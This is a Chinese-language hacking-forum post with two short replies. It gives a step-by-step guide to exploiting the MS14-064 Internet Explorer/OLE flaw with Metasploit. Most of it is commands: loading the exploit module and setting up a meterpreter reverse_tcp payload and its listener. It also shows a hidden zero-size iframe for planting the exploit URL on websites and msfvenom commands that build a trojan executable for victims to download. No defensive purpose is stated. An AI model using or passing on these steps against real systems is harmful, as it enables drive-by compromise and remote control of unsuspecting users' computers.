查看: 18380|回复: 2

ms14_064漏洞利用

[复制链接]
发表于 2019-10-13 18:56:03 | 显示全部楼层 |阅读模式
本帖最后由 bailancheng 于 2019-10-13 19:13 编辑

ms14_064:顾名思义为14年第六十四个漏洞

漏洞利用环境:
远程攻击者可利用此漏洞通过构造的网站执行任意代码。
影响Win95+IE3 ~Win10+IE11全版本。
Metasploit中此漏洞的利用模块是exploit/windows/browser/ms14_064_ole_code_execution,
由于这个exploit需要调用powershell,因而只对安装有powershell的系统有效。

调用exploit
        msf > use exploit/windows/browser/ms14_064_ole_code_execution
查看选项
msf exploit(ms14_064_ole_code_execution) > show options
设置允许调用powershell
msf exploit(ms14_064_ole_code_execution) > set AllowPowershellPrompt true
设置本机IP
msf exploit(ms14_064_ole_code_execution) > set srvhost 192.168.80.147

调用payload
msf exploit(ms14_064_ole_code_execution) > set payload windows/meterpreter/reverse_tcp
查看选项
msf exploit(ms14_064_ole_code_execution) > show options
设置监听IP
msf exploit(ms14_064_ole_code_execution) > set lhost 192.168.80.147
设置监听端口
msf exploit(ms14_064_ole_code_execution) > set lport 5555
运行
msf exploit(ms14_064_ole_code_execution) > run(或exploit)
攻击开始会显示有木马的url,可以在网站上挂马:
<iframe src=http://192.168.80.147:8080/T8H6L4XgLAQQqdN width=0 height=0 frameborder=0></iframe>
也可以生成木马:
可以利用Kali中的msfpayload工具将Metasploit 中的payloads包装成一个可执行的文件,或者包装成指定的类型,从而生成木马。
root@localhost:~# msfpayload windows/meterpreter/reverse_tcp LHOST=本机IP LPORT=指定端口 X > /root/ma.exe

在Kali2中将msfpayload和msfencode组合在一起,称为msfvenom。
root@localhost:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.4.191 lport=4444 -f exe -o /root/ma.exe
在这里生成木马之后就可以放在网站目录中生成了木马文件。
用户点击下载之后:
调用exploit模块
msf > use exploit/multi/handler

设置payload
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.80.147
msf exploit(handler) > set LPORT 4444




回复

使用道具 举报

发表于 2019-10-13 23:02:38 | 显示全部楼层
可以的  不错  加油

点评

谢谢你  详情 回复 发表于 2019-10-15 16:38
回复 支持 反对

使用道具 举报

 楼主| 发表于 2019-10-15 16:38:54 | 显示全部楼层
90_ 发表于 2019-10-13 23:02
可以的  不错  加油

谢谢你
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

旗下站点

邮箱系统

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2025-3-7 15:27 , Processed in 0.029191 second(s), 13 queries , Gzip On, MemCache On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部